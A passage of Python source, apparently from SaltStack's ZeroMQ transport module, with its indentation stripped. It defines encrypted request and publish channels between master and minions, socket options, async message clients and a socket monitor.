# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
# Import third party libs
from salt.ext import six
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
zmq.eventloop.ioloop.install()
io_loop = tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncZeroMQReqChannel for {0}'.format(key))
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = obj
log.trace('Inserted key into loop_instance_map id {0} for key {1} and process {2}'.format(id(loop_instance_map), key, os.getpid()))
else:
log.debug('Re-using AsyncZeroMQReqChannel for {0}'.format(key))
return obj
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop',):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClientPool(result.opts,
args=(result.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop}))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
zmq.eventloop.ioloop.install()
self._io_loop = tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
            # we don't need to worry about auth as a kwarg, since it's a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
self.message_client = AsyncReqMessageClientPool(self.opts,
args=(self.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop})
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
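    # Editor's note: for illustration only, the dict above typically looks like
    #     {'enc': 'aes', 'load': <encrypted or clear payload>}
    # where 'enc' mirrors self.crypt.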
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
            # Return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
cipher = PKCS1_OAEP.new(key)
if 'key' not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before failing
        :param int timeout: The number of seconds to wait for a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
            # we may not always have data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before failing
        :param int timeout: The number of seconds to wait for a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw)
raise tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = tornado.ioloop.IOLoop.current()
self.hexid = hashlib.sha1(six.b(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')
self._socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b'')
self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id']))
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
            # TODO: Optionally call stream.close() on newer pyzmq? It's broken on some
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
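    # Editor's note: e.g. 'tcp://203.0.113.5:4505' once publish_port has been
    # learned from auth.creds (the address is a documentation placeholder; 4505
    # is the conventional Salt publish port).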
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
        # if it was one message, then it's the old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
if messages[0] not in ('broadcast', self.hexid):
log.debug('Publish received for not this minion: {0}'.format(messages[0]))
raise tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
            raise Exception(('Invalid number of messages ({0}) in zeromq pub '
                             'message from master').format(messages_len))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
self.__setup_signals()
salt.utils.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
            # Socket monitor shall be used only for debug purposes, so using threading doesn't look too bad here
import threading
self._monitor = ZeroMQSocketMonitor(self.clients)
t = threading.Thread(target=self._monitor.start_poll)
t.start()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
log.info('MWorkerQueue under PID %s is closing', os.getpid())
self._closing = True
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_w_monitor') and self._w_monitor is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, '_socket') and self._socket.closed is False:
self._socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
# The socket monitor should only be used for debug purposes, so using threading doesn't look too bad here
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
t = threading.Thread(target=self._w_monitor.start_poll)
t.start()
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(self.w_uri))
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from the underlying ZeroMQ streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc:
exc_type = type(exc).__name__
if exc_type == 'AuthenticationError':
log.debug(
'Minion failed to auth to master. Since the payload is '
'encrypted, it is not known which minion failed to '
'authenticate. It is likely that this is a transient '
'failure due to the master rotating its public key.'
)
else:
log.error('Bad load from minion: %s: %s', exc_type, exc)
stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: {0} and load was {1}'.format(payload, payload.get('load')))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun {0}'.format(req_fun))
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
'''
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
its host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and opts:
if 'tcp_keepalive' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE, opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl']
)
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 <= zmq < 3.0, there is only one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0o177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
# otherwise it's a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: {0}".format(match_ids))
# Send list of minions through so zmq can target them
int_payload['topic_lst'] = match_ids
pub_sock.send(self.serial.dumps(int_payload))
pub_sock.close()
context.term()
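# Usage sketch (illustrative; the 'fun' key is a placeholder beyond the
# 'tgt'/'tgt_type' fields this method actually reads, and a real master process
# must have populated salt.master.SMaster.secrets first):
#
# channel = ZeroMQPubServerChannel(opts)
# channel.publish({'tgt_type': 'glob', 'tgt': '*', 'fun': 'test.ping'})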
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class around AsyncReqMessageClient to avoid blocking while waiting to write data to the socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
def __del__(self):
self.destroy()
def destroy(self):
for message_client in self.message_clients:
message_client.destroy()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underlying zeromq REQ socket and gives a future-based
interface to sending and receiving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
# TODO: Optionally call stream.close() on newer pyzmq? It is broken on some.
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.stream = None
self.socket.close()
if self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timed out
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except: # pylint: disable=W0702
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't already timed out
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. ({0}/{1})'.format(future.attempts, future.tries))
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
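# Usage sketch (illustrative; the address and payload are placeholders): send()
# returns a Tornado future, so a caller yields it inside a coroutine to obtain
# the decoded reply, and destroy() tears the socket down afterwards.
#
# @tornado.gen.coroutine
# def _example_request(opts):
#     client = AsyncReqMessageClient(opts, 'tcp://127.0.0.1:4506')
#     try:
#         reply = yield client.send({'cmd': 'ping'}, timeout=5, tries=3)
#     finally:
#         client.destroy()
#     raise tornado.gen.Return(reply)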
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
